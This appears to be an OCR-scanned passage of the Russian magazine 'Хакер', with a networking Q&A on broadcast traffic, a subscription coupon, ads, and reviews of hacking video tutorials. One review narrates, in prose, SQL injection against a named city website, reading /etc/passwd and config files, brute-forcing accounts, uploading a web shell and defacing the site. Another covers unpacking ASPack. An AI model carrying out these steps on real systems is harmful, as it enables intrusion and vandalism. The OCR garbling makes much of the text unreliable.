А: Кто-то возможно спросит: «А зачем, 

собственно, нужно бороться с широковеща- 
тельным трафиком?» На то есть несколько 
причин. Во-первых, броадкаст-пакеты приво- 
дят к снижению производительности хостов 

— каждый получивший их компьютер должен 
соответствующим образом пакеты обрабо- 
тать. Во-вторых, это приводит к истощению 
ресурсов сети. Суди сам: получив на один из 
портов широковещательный фрейм, комму- 
татор ретранслирует его во все остальные 
порты. Естественно, это приводит к увеличе- 
нию нагрузки, и следовательно, к повышен- 
ному тепловыделению и снижению ресурса 
работы оборудования. И все это зачастую 
необоснованно! Как с этим можно бороться? 
Есть два основных варианта: 

1. Разбить большую сеть на подсети и нала- 
дить между ними связь посредством марш- 
рутизаторов. По умолчанию роутер не про- 
пускает широковещательные пакеты — вот 
тебе и решение. Аналогичную функцию могут 
выполнять и управляемые коммутаторы, но 
для этого они, как правило, требуют дополни- 
тельной настройки. 

2. Создать ѴІ_АІ\І (Виртуальные локальные 
сети, Ѵігіиаі І_осаІ Агеа Ыеіѵѵогк). Напомню, 
что ѴІ_АЫ могут являться частью І_АІ\І, имея 
определенные правила взаимодействия с 
другими ѴІ_АІ\І, либо быть полностью изоли- 
рованными от них. Иначе говоря, это про- 
стейший механизм изоляции различных под- 
сетей, работающих через общие свитчи и 
роутеры. Броадкаст при правильном подходе 
очень удачно режется. 

И последнее. Самый действенный способ 
борьбы с широковещательным трафиком 

— это грамотное планирование сети. А для 
этого нужно четко представлять устройство 
сетевых протоколов и общие принципы пост- 
роения локалки. пс 
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«Хакер» +0Ѵ0 



990р ЗА 6 МЕСЯЦЕВ 



1 920р ЗА 12 МЕСЯЦЕВ 



«Хакер» + «Хакерга» 



1830р ЗА 6 МЕСЯЦЕВ 



3600Р ЗА 12 МЕСЯЦЕВ 






«Хакер» +Р\Ю 



РЕДАКЦИОННАЯ 

ПОДПИСКА 



990р 


ЗА 6 МЕСЯЦЕВ 


1920р 


ЗА 12 МЕСЯЦЕВ 



«Хакер» + «Хакери» 



1 Заполни купон и квитанцию 

2 Перечисли стоимость подписки через Сбербанк 

3 Обязательно пришли в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 

по электронной почте: зиЬзсгіЬе@дІс.ги; 
по факсу: 8-495-780-88-24; 

по адресу: 119021, Москва, ул. Тимура Фрунзе, д.11, стр. 44-45 

4 Получи 300 бонусов от тподо.ш 

ВНИМАНИЕ! 

подписка оформляется в день обработки купона и квитанции. 

Купоны, отправленные по факсу или электронной почте, обрабатываются 
в течение 5 рабочих дней. Купоны, отправленные почтой 
на адрес редакции обрабатываются в течение 20 дней. 

Рекомендуем использовать электронную почту или факс. 



Подписка производится с номера, выходящего через один календарный месяц 
после оплаты. Например, если произвести оплату в сентябре, то подписку 
можено оформить с ноября. 

По всем вопросам, связанным с подпиской, звони по бесплатным телефонам: 
780-88-29 (для москвичей) и 8-800-200-3-999 (для регионов и абонентов 
Билайн, МТС и МегаФон). 

Вопросы по подписке можно задавать по е-таіі: іпІо@д!с.ги 



1830р ЗА 6 МЕСЯЦЕВ 
ЗбООр ЗА 12 МЕСЯЦЕВ 



Подписка 

для юридических лиц 

Москва: ООО «Интер-Почта», 
тел.: 500-00-60, ѵѵѵѵѵѵ.іпіегросНіа.ги 

Для получения счета на оплату подпис- 
ки нужно прислать заявку с названием 
журнала, периодом подписки, банковс- 
кими реквизитами, юридическим и поч- 
товым адресом, телефоном и фамилией 
ответственного лица за подписку. 



■ 

А- 



ПОДПИСНОЙ КУПОН 

Прошу оформить подписку: 



I I на журнал Хакер + ОѴй 

на комплект Хакер+ ОѴР и Хакер Спец + СО 



на □ 



месяцев 



начиная с 



200 г 



|—| Доставлять журнал по почте 
1 на домашний адрес 
|—| Доставлять журнал курьером на 
* адрес офиса (по г. Москве) 



Подробнее о курьерской доставке читайте ниже 



(отметьте квадрат выбранного варианта подписки) 



Ф.И.О. 



пп. пп. пп. 

день месяц год 

АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( } 

код 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата за « 


» 


Сумма 


с 


200_ г. 





месяц 



Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 




Сумма 


Оплата за « 


» 




с 


200_ г. 





месяц 



Ф.И.О. 



Кассир 



Подпись плательщика 




00 ПРОГРАММ ДЛЯ ЗЛОМА 
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Расо 



Мутим $$Н-туннель 

Все мы уже наслышаны о том, что 80І_ 
Ігуесііоп — это метод, позволяющий вво- 
дить свои собственные 801-запросы 
через ѵѵеЬ-сценарии. В данном видео- 
ролике хакеру предстоит проверить на 
стойкость официальный сайт города 
Воронежа. Сначала хакер заходит на 
главную страницу и обращает внимание, 
что новостной движок написан на РНР, 
которому вдобавок передаются много- 
численные параметры через перемен- 
ную Ю. Простой подстановкой кавычки 
багоискатель вызывает ошибку запроса. 
Подобрав нужное количество столбцов 
для ІІІІМІОЫ 8ЕІ_ЕСТ, он получает возмож- 
ность вывода данных на экран. К сожале- 
нию, подобрать имя таблицы БД Му80І_у 
него не получилось, но это скорее даже 
подзадорило взломщика. Теперь коман- 
дами ЭАТАВА8Е(), ЕІ8ЕР() и ѴЕР8ЮЫ() 
он просматривает информацию о Му80І_ 
сервере. Используя І_оасІ_РіІе(/еІс/ 
раззѵѵб) в запросе он получает список 
юзеров. После всех этих манипуляций 
негодяй вдруг решает посмотреть, какая 
борда установлена на данном сайте и... 
узнает, на сайте используется рНрВВ. 
Имея возможность открывать файлы на 
сервере и зная, что конфиг движкалежит 
в стандартной папке, хакер вызывает 
ошибку в скрипте, чтобы узнать полный 
путь к форуму (и соответствен его сопТід. 
рНр). После чего командой І_оасІ_РіІе(") 
открывает его и видит, что данные на 
странице не были отображены. Однако 
его спасает исходник страницы, в кото- 
ром хакер все-таки находит интересные 
ему данные. 

После быстрого анализа, ему попадается 
на глаза строка $бЫпоз! = 'ІосаІИозі';. Это 
означает, что скрипт к базе подрубается 
с локалхоста. «Не повезло... но пойдем 
другим путем» — подумал он. Теперь 



хакер берет файл юзеров, полученный 
/ѳіс/раззѵѵсі, и составляет список для бру- 
та. Таким образом ему удалось надыбать 
два аккаунта: используя один из них, наш 
герой получает локальный шелл. Залив 
веб-шелл в домашнюю директорию, 
хакер пытается коннектиться к Му80І_- 
базе, указывая данные из файла сопТід. 
рИр. Коннект, как ни странно, прошел 
успешно. Получив доступ к БД наш герой 
видит, что с кодировкой, мягко сказать, 
фигово, но с помощью утилиты Штирлиц 
он переводит текст в перевариваемый 
вид и делает дефейс. 

Распаковка А8Раск 

Продолжая серию видеороликов по рас- 
паковке программ, чел Ы[1]п заостряет 
внимание на очень популярной тулзе — 
А8Раск. Эта штука шароварная, и никто 
так и не смог понять, как главному герою 
удалось достать зарегистрированную 
версию. Наверное, он ее купил :). Избрав 
подопытной программой стандартный 
виндовый калькулятор, крекер приступил 
к работе. Сначала он действовал по обыч- 
ной схеме: при помощи шестнадцатерич- 
ного редактора и отладчика хакер нашел 
адрес ОЕР. Далее, не изобретая велоси- 
пед, он снял дамп специальным плагином 
ОІІуЭитр. Наверняка, ты скажешь, что 
теперь ему самое время восстанавливать 
таблицу импорта. И многие бы, наверное, 
так и поступили, но наш герой не из про- 
стых смертных. Взломщик решил совер- 
шить акт надругательства и извращения 
над пакером, зверски выдрав ресурсы из 
его секций и снеся все остатки его былой 
славы. Для этого Блинчик прикрутил все 
ресурсы в одну отдельную секцию и толь- 
ко потом двинулся восстанавливать таб- 
лицу импортов. Далее он решил немного 
уменьшить размер файла и оптимизиро- 
вать его, что естественно ему удалось. 



[ АКЦИЯ журнала] 

ПОЛУЧИ 

ПОДАРОК 

за покупку журнала “Хакер” 




ЕСЛИ У ТЕБЯ ЕСТЬ 
КАРТА МЫОСО.КІІ: 



Введи бонусный номер на 

ѵѵѵѵѵѵ.т подо. ги /хакер и твой счет 
пополнится на 50 бонусов. 



Ваша награда за покупку журнала 

Уникальный 
бонусный номер 



105 553 633 022 

МЫО^ЯО 



БОНУС 

50 



Бонусный номер действителен в 



ННр://тпоёо.ги 
сІиЬ@тпоёо. ги 

іе 35 дней со дня выхода журнала в продажу 



Оформи подписку и получи все 
бонусы сразу! 



4 За полугодовую подписку счет 
пополнится на 150 бонусов! 

* За годовую подписку - 300 бонусов! 




ЕСЛИ У ТЕБЯ ЕЩЕ 
НЕТ КАРТЫ МІЧОСО.ІШ: 



■» Заполни анкету на 

ѵѵѵѵѵѵ.т подо, ги /хакер и Хакер 
вышлет тебе карту Мподо.ги! 




* Чтобы накопить на подарок 
быстрее, получай бонусы еще 
в 800 предприятиях! 

* Обменивай бонусы на любой 
подарок: подписку на журнал Хакер, 
последние новинки Сй, МрЗ и 
еще на 600 призов из каталога 

на ѵѵѵѵѵѵ.тподо.ги 



+ В День Рождения тебя ждет 
бонусный подарок! 



Ь 



Подробности по тел.: (495) 961-1 1-66 
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Во ВластиКачества 

Яркое насыщенное изображение 

Жидкокристаллически монитор И7ЕЙ56’5Н РМгоп 
Видимая область 1 Т (43, 1 8 см) /Точка 0. 264 х 0,264 мм 
Яркость 250 кд/м2 ■ типичная /Контрастность 500; I - типичная 
Подсветка 4 лампы ССРІ /Угол обзора 160' по горизонтали, 160 е по вертикали 
Время отклика 8 мс /Глубина цвета 1 6,2 млн. цветов 
Соответствие стандартам ТСО'ОЗ /Разрешение 1280x1 024@75 Гц 



Информационная служба Ш Еесітопісз В-ЯИ-200-76-76 (бесгимтная горячая линия по Росни) ѵлш.Ід.ш 




"'ПіпаѴі, 



ИісГогІа 

(099) ЛН-іИ-17, 649-27-69 
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й тарифный план 



Новый 



ѵѵѵѵѵѵі .тіз.ги 



на тарифе «ПЕРВЫЙ» 

ВСЕ НОМЕРА МТС -ЛЮБИМЫЕ 



СКИДКА ОТ 50% 



НА ЗВОНКИ ВНУТРИ СЕТИ 



ПОДКЛЮЧИТЕ УСЛУГУ «НОМЕРА МТС» ПО НОМЕРУ 05906 



Услуга доступна на ТП «Первый» с 30 июня 2006 г. Услуга платная. Скидка действует при подключенной услуге «Номера МТС». 
Размер скидки может отличаться для различных регионов. При подключенной услуге скидка распространяется на исходящие вызовы 
на мобильные телефоны МТС Вашего региона при нахождении в домашней сети. 

Подробная информация об услуге - на гпіб.ш и в офисах МТС Вашего региона. 
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